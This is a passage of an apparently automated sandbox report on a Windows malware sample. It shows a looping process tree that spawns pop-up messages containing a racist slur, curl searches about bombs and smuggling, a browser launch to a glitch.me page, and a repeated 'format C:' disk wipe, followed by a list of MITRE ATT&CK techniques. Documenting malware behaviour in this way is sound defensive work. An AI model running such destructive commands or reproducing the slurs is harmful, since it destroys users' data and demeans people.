      4⤵
      PID:3128
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4028
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5492
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3088
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:308
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4088
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4844
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:3664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1384
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3748
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1548
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1028
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3636
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5096
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1468
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6116
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4172
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2848
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4928
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1616
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1384
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5820
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5744
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4004
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3748
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4768
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1856
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3124
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3636
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4248
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2104
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1032
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4020
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2156
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1960
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5072
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1372
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5828
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5528
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:460
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2028
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4968
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6056
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3176
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2168
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4400
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2800
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2320
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5316
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5228
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3808
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:236
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3608
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3920
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1028
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5204
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3696
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4380
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4880
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3828
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2004
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3628
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5516
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3696
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5084
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4984
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4440
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2408
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:312
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:968
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1972
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4264
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2008
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:2072
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1512
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1972
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:312
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4024
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4648
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3464
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5860
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3804
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1908
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4024
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4648
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5992
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2072
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4280
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3804
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6188
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6216
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6232
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6336
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6492
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6540
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6604
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7112
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7128
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7144
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1200
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1556
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6316
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6332
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6472
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6768
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3016
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6868
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6888
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4484
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5124
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6284
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6648
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6768
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6800
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6708
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6716
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5904
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1932
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6348
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6880
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7040
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6872
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6716
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:2836
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6268
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4164
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7104
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6792
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3016
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6272
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4680

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
1⤵
PID:3720

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5132

C:\Users\Admin\AppData\Local\Windows Host Service.scr
"C:\Users\Admin\AppData\Local\Windows Host Service.scr"
1⤵
- Executes dropped EXE
PID:6532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry